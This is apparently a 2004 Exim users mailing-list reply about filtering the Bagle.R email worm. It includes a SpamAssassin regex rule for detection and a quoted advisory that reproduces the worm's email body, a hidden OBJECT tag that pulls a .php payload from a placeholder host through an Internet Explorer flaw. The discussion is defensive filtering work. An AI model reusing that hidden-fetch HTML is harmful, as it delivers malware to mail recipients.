>From: Tim Jackson <lists@???>
>To: exim-users@???
>Subject: Re: [Exim] More windows viruses
>Date: Thu, 18 Mar 2004 17:50:02 +0000
>
>Hi Nigel, on Thu, 18 Mar 2004 17:35:59 +0000 you wrote:
>
>[Bagle Q/R]
>> I'd be interested if anyone has a exiscan acl rule that kills this off
>> with a high degree of certainty since theres bound to be a pile of these
>> around soon.
>
>No, but I've had the following rule in my bogus-virus-warnings SpamAssasin
>ruleset since earlier today; I guess you could drop the regex into the
>DATA ACL equally well:
>
>rawbody VIRUS_WARNING_BAGLE3 /^<OBJECT STYLE="display:none"
>DATA="http:\/\/[0-9\.]+:81\/[0-9]+\.php">$/
>describe VIRUS_WARNING_BAGLE3 Looks like Bagle.R virus/bounce
>score VIRUS_WARNING_BAGLE3 10
A message that arrived on the UK security mailing list earlier today
included:
The virus itself is not sent as an attachment, but is instead
downloaded from the infecting machine exploiting a vulnerability
in Internet Explorer. The contents of the email are:
<html><body>
<font face="System">
<OBJECT STYLE="display:none" DATA="
http://a.b.c.d/123456.php">
</OBJECT></body></html>
So I guess a slight mod to Tim's regex should do the trick.